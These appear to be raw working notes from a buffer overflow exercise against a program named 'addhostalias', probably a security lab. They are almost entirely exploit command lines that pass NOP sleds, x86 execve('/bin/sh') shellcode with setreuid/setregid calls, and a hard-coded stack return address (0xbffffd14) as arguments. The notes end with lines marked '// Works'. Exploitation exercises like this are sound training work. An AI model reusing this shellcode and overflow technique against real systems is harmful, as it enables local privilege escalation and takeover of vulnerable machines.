
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

run $(python -c 'print "\x87"*136') $(python -c 'print "\x41"*137') $(python -c 'print "\x90"*137') 

run $(python -c 'print "\x87"*136') $(python -c 'print "\x41"*88 + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42" ') $(python -c 'print "\x90"*137') 

run $(python -c 'print "\x87"*137') $(python -c 'print "\x41"*88 + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42" ') $(python -c 'print "\x90"*137') 


//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

 x/300x $sp

"\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

75

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

256
run $(python -c 'print "\x41"*85') $(python -c 'print "\x41"*85') $(python -c 'print "\x90"*86')


264 
run $(python -c 'print "\x41"*89') $(python -c 'print "\x41"*89') $(python -c 'print "\x90"*86') 


Rebalancing
264 

run $(python -c 'print "\x90"*103') $(python -c 'print "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"') $(python -c 'print "\x01\x02\x03\x04"*22') 


//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Address is: 
0xbffffd14

Just before SEGFAULT
run $(python -c 'print "\x90"*89') $(python -c 'print "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"') $(python -c 'print "\x14\xfd\xff\xbf"*22') 

run $(python -c 'print "\x90"*137') $(python -c 'print "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"') $(python -c 'print "\x14\xfd\xff\xbf"*10')

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

run $(python -c 'print "\x90"*149') $(python -c 'print "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"') $(python -c 'print "\x14\xfd\xff\xbf"*10')

run $(python -c 'print "\x90"*102') $(python -c 'print "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"') $(python -c 'print "\x14\xfd\xff\xbf"*10')

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Works


./addhostalias "\x90" "\x90" $(python -c 'print "\x90"*127 + "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  + "\x14\xfd\xff\xbf"*15')

./addhostalias "\x90" "\x90" $(python -c 'print "\x90"*147 + "\xb9\xff\xff\xff\xff\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\xb0\x32\xcd\x80\x89\xc3\xb0\x31\xb0\x47\xcd\x80\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  + "\x14\xfd\xff\xbf"*10')
































